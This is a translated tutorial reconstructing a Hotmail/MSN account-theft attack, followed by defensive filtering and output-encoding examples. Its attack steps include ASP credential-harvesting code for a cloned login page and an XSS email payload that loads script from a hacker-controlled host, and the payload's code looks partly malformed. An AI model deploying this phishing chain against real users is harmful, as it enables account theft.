Last time we introduced what a cross-site scripting (XSS) attack is. Today, let's look at a specific case and explain how to avoid cross-site attacks.
Cross-site attack case reconstruction: MSN account theft through cross-site scripting
Based on the clues provided by netizens, we reconstructed how their MSN accounts were lost and deduced how the hackers stole them.
Step 1: The hacker first creates a forged webpage identical to the Hotmail logon interface. Log on to the official Hotmail website, click "File" in the menu bar, and choose "Save As" from the drop-down menu to save the page. Then open the saved page in a web editing program such as Dreamweaver (Figure 1), find the form fields where the username and password are entered, and add the following code, which captures the username and password:
Figure 1
<%
bbsuser = Request("bbsuser")
bbspwd = Request("bbspwd")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
' Open the file system service
Set file = fs.OpenTextFile(Server.MapPath("Hotmail.txt"), 8, True)
' Create "Hotmail.txt" if it does not exist and open it for appending
file.WriteLine bbsuser & "----" & bbspwd
' Write the captured username and password to "Hotmail.txt"
file.Close
Set file = Nothing
Set fs = Nothing
%>
Then modify the local link addresses and related parameters on the copied Hotmail page so that its images display correctly. Finally, save the page as "index.asp" and upload it to the hacker's website.
Step 2: With the camouflaged page ready, the hacker next creates the cross-site Hotmail email. Hackers generally choose an email client that can edit the HTML code of a message directly, such as DreamMail. After starting DreamMail, set up an email account that supports POP3.
Then click the "Switch to Deluxe Edition" option under "View" on the DreamMail menu bar and create a blank HTML email. Right-click the message body and choose "Edit HTML source code"; in the HTML source editing window that pops up, enter the following XSS code:
<font color="ffffff">
<div id="jmp" style="display: none">nop</div>
<div id="ly" style="display: none">function OK() {return true}; window.onerror = OK</div>
<div id="tip" title="<a style="display: none">" style="display: none"></div>
<div id="tap" title="<" style="display: none"></div>
<div id="tep" title=">" style="display: none"></div>
<style>div {background-image: expression(javascript: 1 ? document.write(connector + ; top: + EC_tap.title + /a + EC_tep.title + EC_tap.title + script id=nop + EC_tep.title + connector + EC_tap.title + /script + EC_tep.title + EC_tap.title + script src=http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com + EC_tep.title + EC_tap.title + /script + EC_tep.title) : 1 = 1);}</style></font>
In this code, the hacker changes "http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com" to point at the forged page uploaded in Step 1. After the email is edited, click "OK" to finish creating the cross-site email.
Step 3: The hacker gives the email an eye-catching subject and sends it to the victim's MSN mailbox. When the victim opens the email in Hotmail, a Hotmail logon box pops up, tricking them into entering their account and password to log on. If the victim is careless and enters the account and password on the malicious page, the information is sent not to Microsoft's server but quietly to the hacker (Figure 2).
Figure 2
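As an added example (not part of the original article) of what a webmail service can do on its own side, the following JavaScript checks an inbound HTML message for the markers used by the message described in Steps 2 and 3 and strips the markup that carries the script. The rule ids, the function names and the constructed sample message are this example's own; the sample only mirrors the structure of the article's message, with the script-building string replaced by a placeholder.

```javascript
// Added example (not from the original article): a server-side check a webmail
// service could run over an inbound HTML message body before rendering it.
// It flags the markers of the IE-era CSS expression() injection shown in the
// article and strips the active content that makes such a message dangerous.
// Rule ids, function names and the sample message are this example's own.

const RULES = [
  { id: "css-expression", why: "CSS expression() runs script in old IE",
    re: /expression\s*\(/i },
  { id: "script-in-style", why: "script construction inside a <style> block",
    re: /<style[^>]*>[\s\S]*?(document\.write|<\/?script|javascript:)[\s\S]*?<\/style>/i },
  { id: "onerror-suppression", why: "window.onerror override hides script errors from the victim",
    re: /window\s*\.\s*onerror\s*=/i },
  { id: "hidden-char-container", why: "hidden element whose title holds '<' or '>' for later assembly",
    re: /<div[^>]*title\s*=\s*["']?\s*[<>][^>]*display\s*:\s*none/i },
  { id: "remote-script", why: "script loaded from a remote host inside a message body",
    re: /<script[^>]*\bsrc\s*=\s*["']?https?:\/\//i },
];

// Return the id and reason of every rule the message triggers, sorted by id.
function scanHtmlMail(html) {
  return RULES.filter((r) => r.re.test(html))
    .map((r) => ({ id: r.id, why: r.why }))
    .sort((a, b) => a.id.localeCompare(b.id));
}

// Remove <style> and <script> blocks, inline style attributes and on* event
// handlers; what remains can carry neither the expression() nor the script.
function stripActiveContent(html) {
  return html
    .replace(/<style[\s\S]*?<\/style>/gi, "")
    .replace(/<script[\s\S]*?<\/script>/gi, "")
    .replace(/\s(on\w+|style)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, "");
}

// Constructed sample modelled on the structure of the article's message
// (the script-building string is replaced by a placeholder).
const SAMPLE_MAIL = [
  '<font color="ffffff">',
  '<div id="ly" style="display: none">function OK() {return true}; window.onerror = OK</div>',
  '<div id="tap" title="<" style="display: none"></div>',
  '<div id="tep" title=">" style="display: none"></div>',
  '<style>div {background-image: expression(document.write("placeholder"))}</style>',
  "</font>",
].join("\n");

// Constructed benign message for comparison.
const BENIGN_MAIL = "<p>Hi, the <b>report</b> is attached.</p>";

// Usage: scanHtmlMail(SAMPLE_MAIL) reports four findings, scanHtmlMail(BENIGN_MAIL)
// reports none, and scanHtmlMail(stripActiveContent(SAMPLE_MAIL)) no longer
// reports the expression() or hidden-container findings.
```

The scanner is deliberately pattern-based: its purpose is to show which features of the message a mail filter can key on, while stripping is what actually removes the risk, since a message body has no legitimate need for style blocks, script or event handlers.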
Cross-site defense solution
To prevent XSS attacks, ordinary users should, apart from not clicking links in unfamiliar messages, preferably disable JavaScript in the browser. In addition, setting IE's security level to the highest prevents cookie theft. When building webpages, site administrators should filter the special characters in user input, which blocks most XSS attacks. If a webmaster finds a cross-site vulnerability on his website, he must fix the affected program promptly.
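The advice to site administrators above, applied as output encoding, as an added example that is not part of the original article: a page that echoes a user-supplied value (such as the uid parameter seen in the URL above) once without encoding and once with it. The function names and the sample value are this example's own.

```javascript
// Added example (not from the original article): the "filter special
// characters" advice applied as output encoding in a page that echoes a
// user-supplied value. Function and variable names are this example's own.

// Encode the five characters that let text break out of an HTML context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[ch]);
}

// Vulnerable: the parameter is spliced into the page unchanged, so a value
// containing markup becomes part of the page.
function renderGreetingUnsafe(uid) {
  return "<p>Welcome, " + uid + "</p>";
}

// Hardened: the same page, with the parameter encoded before insertion.
function renderGreetingSafe(uid) {
  return "<p>Welcome, " + escapeHtml(uid) + "</p>";
}

// Does the rendered page contain any tag that is not part of the template?
// Used here only to make the difference between the two renderers checkable.
function containsInjectedTag(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi) || [];
  return tags.some((t) => !/^<\/?p>$/i.test(t));
}

// Constructed sample input: a value that carries a script tag (placeholder host).
const SAMPLE_UID = '<script src="http://example.invalid/x.js"></script>';

// Usage: containsInjectedTag(renderGreetingUnsafe(SAMPLE_UID)) is true,
// containsInjectedTag(renderGreetingSafe(SAMPLE_UID)) is false.
```

Encoding at the point of output, rather than stripping characters on input, keeps the user's text intact while guaranteeing that it is shown as text and never interpreted as markup.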